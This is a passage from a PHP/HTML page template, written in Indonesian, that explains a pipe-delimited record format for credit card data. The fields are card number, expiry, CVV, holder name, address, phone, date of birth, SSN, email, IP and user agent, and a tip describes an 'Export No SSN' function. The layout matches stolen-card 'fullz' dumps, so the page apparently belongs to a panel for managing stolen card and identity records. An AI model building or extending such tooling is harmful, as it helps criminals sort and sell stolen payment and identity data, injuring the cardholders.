                    <span class="yellow">CC_NUMBER</span>|<span class="yellow">EXP_MONTH</span>|<span class="yellow">EXP_YEAR</span>|<span class="yellow">CVV</span>|<span class="yellow">NAME</span>|<span class="yellow">ADDRESS</span>|<span class="yellow">CITY</span>|<span class="yellow">STATE</span>|<span class="yellow">ZIP</span>|<span class="yellow">COUNTRY</span>|<span class="yellow">PHONE</span>|<span class="yellow">DOB</span>|<span class="yellow">SSN</span>|<span class="yellow">EMAIL</span>|<span class="yellow">IP</span>|<span class="yellow">USER_AGENT</span>
                </code>
            </div>
            
            <div style="margin-top: 20px; display: grid; grid-template-columns: repeat(auto-fill, minmax(200px, 1fr)); gap: 10px; font-size: 0.75rem;">
                <div style="padding: 10px; background: rgba(0,0,0,0.2); border-radius: 8px;">
                    <span style="color: var(--accent-green);">CC_NUMBER</span><br>
                    <span style="color: var(--text-dim);">Nomor kartu kredit (16 digit)</span>
                </div>
                <div style="padding: 10px; background: rgba(0,0,0,0.2); border-radius: 8px;">
                    <span style="color: var(--accent-cyan);">EXP_MONTH/YEAR</span><br>
                    <span style="color: var(--text-dim);">Tanggal kadaluarsa (MM|YY)</span>
                </div>
                <div style="padding: 10px; background: rgba(0,0,0,0.2); border-radius: 8px;">
                    <span style="color: var(--accent-purple);">CVV</span><br>
                    <span style="color: var(--text-dim);">Kode keamanan (3-4 digit)</span>
                </div>
                <div style="padding: 10px; background: rgba(0,0,0,0.2); border-radius: 8px;">
                    <span style="color: var(--accent-yellow);">NAME</span><br>
                    <span style="color: var(--text-dim);">Nama pemilik kartu</span>
                </div>
                <div style="padding: 10px; background: rgba(0,0,0,0.2); border-radius: 8px;">
                    <span style="color: var(--accent-pink);">ADDRESS</span><br>
                    <span style="color: var(--text-dim);">Alamat, Kota, State, ZIP</span>
                </div>
                <div style="padding: 10px; background: rgba(0,0,0,0.2); border-radius: 8px;">
                    <span style="color: var(--accent-orange);">DOB/SSN</span><br>
                    <span style="color: var(--text-dim);">Tanggal lahir & SSN (opsional)</span>
                </div>
            </div>
            
            <div style="margin-top: 20px; padding: 15px; background: rgba(255, 215, 0, 0.1); border: 1px solid rgba(255, 215, 0, 0.2); border-radius: 8px;">
                <p style="color: var(--accent-yellow); font-size: 0.8rem; margin: 0;">
                    <i class="bi bi-lightbulb"></i> <strong>Tips:</strong> Gunakan "Export No SSN" untuk menghapus data SSN dan membersihkan pipes kosong (|||) secara otomatis.
                </p>
            </div>
        </div>
    </div>
</div>

<?php include 'include/footer.php'; ?>